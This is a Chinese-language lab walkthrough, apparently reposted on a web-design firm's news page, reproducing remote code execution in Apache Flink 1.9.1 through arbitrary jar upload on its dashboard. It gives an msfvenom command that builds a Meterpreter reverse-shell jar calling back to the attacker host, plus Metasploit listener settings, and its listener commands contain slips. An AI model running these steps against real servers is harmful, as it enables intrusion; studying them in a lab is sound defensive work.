ApacheFlink任意Jar包上传致RCE漏洞复现的示例分析
这篇文章主要为大家展示了“Apache Flink任意Jar包上传致RCE漏洞复现的示例分析”,内容简而易懂,条理清晰,希望能够帮助大家解决疑惑,下面让小编带领大家一起研究并学习一下“Apache Flink任意Jar包上传致RCE漏洞复现的示例分析”这篇文章吧。
创新互联建站专注于信州企业网站建设,成都响应式网站建设公司,商城建设。信州网站建设公司,为信州等地区提供建站服务。全流程按需求定制开发,专业设计,全程项目跟踪,创新互联建站专业和态度为您提供的服务
0x00简介
Apache Flink是近几年大火的数据处理引擎。受到各大厂商的推崇并且已经应用与实际的业务场景中。很多公司在进行选型的时候都会选择Apache Flink作为选型的对象。
Apache Flink能用来做什么?
实时推荐系统
实时报表
实时数仓与ETL
复杂事件处理
实时欺诈与实时信用评估
大数据安全监测
Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。基于流执行引擎,Flink提供了诸多更高抽象层的API以便用户编写分布式任务。
0x01漏洞介绍
攻击者可直接在Apache Flink Dashboard页面中上传任意jar包,从而达到远程代码执行的目的
0x02影响范围
至目前Apache Flink 1.9.1版本
0x03环境搭建
攻击机kali:192.168.10.147
受害机Ubuntu:192.168.10.176
测试环境:Flink 1.9.1 java8+
Apache Flink 1.9.1安装包下载:
https://www.apache.org/dyn/closer.lua/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz
下载完成后使用解压
tar zxvf flink-1.9.1-bin-scala_2.11.tgz
进入bin目录运行./start-cluster.sh启动环境
环境搭建成功 目标站点 http://192.168.10.176:8081
0x04漏洞复现
使用kali生成jar后门包
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.10.147 LPORT=2020 -f jar > shell.jar
攻击机访问目标站点 并上传shell.jar
使用kali配置监听
use exploit/multi/handler
set payload java/shell/reverse_tcp
set RHOST 192.168.10.147
set LPORT 2020
run
点开刚刚上传的shell.jar,触发漏洞
0x05修复方式
更新官网补丁或更新最新版本
以上是“Apache Flink任意Jar包上传致RCE漏洞复现的示例分析”这篇文章的所有内容,感谢各位的阅读!相信大家都有了一定的了解,希望分享的内容对大家有所帮助,如果还想学习更多知识,欢迎关注创新互联行业资讯频道!
文章标题:ApacheFlink任意Jar包上传致RCE漏洞复现的示例分析
网站路径:http://azwzsj.com/article/jhodig.html